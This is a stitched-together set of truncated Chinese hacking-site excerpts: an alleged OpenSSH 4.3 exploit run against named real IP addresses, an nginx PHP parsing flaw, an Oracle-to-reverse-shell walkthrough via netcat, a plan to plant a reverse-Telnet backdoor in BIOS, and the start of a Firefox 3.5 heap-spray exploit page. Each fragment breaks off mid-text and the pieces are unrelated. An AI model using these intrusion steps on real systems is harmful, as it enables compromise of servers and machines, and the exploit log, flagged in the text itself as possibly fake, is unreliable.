openssh 4.3可是redhat enterprise linux 5.3的标配，文中的两个tgz也无法下载了。不知真假，仅供娱乐。anti-sec:~/pwn# ./map ssanz.netIP: 66.197.143.133 ( osiris.ssanz.net )WWW: Apache/2.2.11SSH: SSH-2.0-OpenSSH_4.3IP: 66.197.204.101 ( devil.ssanz.net )WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4SSH: SSH-2.0-OpenSSH_4.3anti-sec:~/pwn# cd xpl/anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22  [+] 0wn0wn – anti-sec group  [+] Target: 66.197.

漏洞介绍：nginx是一款高性能的web服务器，使用非常广泛，其不仅经常被用作反向代理，也可以非常好的支持PHP的运行。321cc发现其中存在一个较为严重的安全问题，默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析，这将导致严重的安全问题，使得恶意的攻击者可能攻陷支持php的nginx服务器。漏洞分析：nginx默认以cgi的方式支持php的运行，譬如在配置文件当中可以以location ~ \.php$ {root html;fastcgi_pass 127.0.0.1:9000;fastcgi_index index.php;fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;include fastcgi_params;}的方式支持对php的解析，location对请求进行选择的时候会使用URI环境变量进行选择，其中传递到后端Fastcgi的关键变量SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定，而通过分析可以看到$fastcgi_script_na

很多时候对于开放1521端口的Windows下Oracle数据库服务器，因为大多存在默认低权限用户dbsnmp，或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令，由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限，直至得到系统的SYSTEM权限。而 对于Linux下的Oracle数据库入侵，因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑，所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候，可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上，以下用简单 的方式获取Oracle的shell，即采用nc反弹的shell的方式。1、Oracle数据库支持JAVA（如Windows下入侵一般）2、通过Oracle客户端sqlplus，以sysdba用户登录（dbsnmp用户可提权至sysdba）3、执行以下代码：CODE_1:create or replace and resolve java source named "oraexec" as import ja

[项目简述]     该项目仅为实验性项目,目的是学习国外技术。该项目主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受CMD控制。[关于作者]     姓名：成松林 QQ:179641795 Email:cheng_5103@126.com 本人对计算机的诸多技术都很有兴趣，常喜欢学习国外的开源项目，很佩服国外的计算机技术及知识。本人学历：中专，专业：计算机，年龄：25，工作：中专学业完成后留校工作。废话：本人家景很穷，所以大学都未上成就工作，希望有志人士能教小弟赚钱。我文才很差，故文章中有语法及表达问题请大家多多谅解。[项目涉及的相关知识及技术标题]    1、实验环境配置问题。    2、刷新BIOS技术问题。    3、代码植入BIOS问题。    4、源代码的相关问题： &

XML/HTML代码 <html>   <head>   <title>Firefox 3.5 Vulnerability</title>   Firefox 3.5 Heap Spray Vulnerabilty    </br>   Author: SBerry aka Simon Berry-Byrne    </br>   Thanks to HD Moore for the insight and Metasploit for the payload    <div id=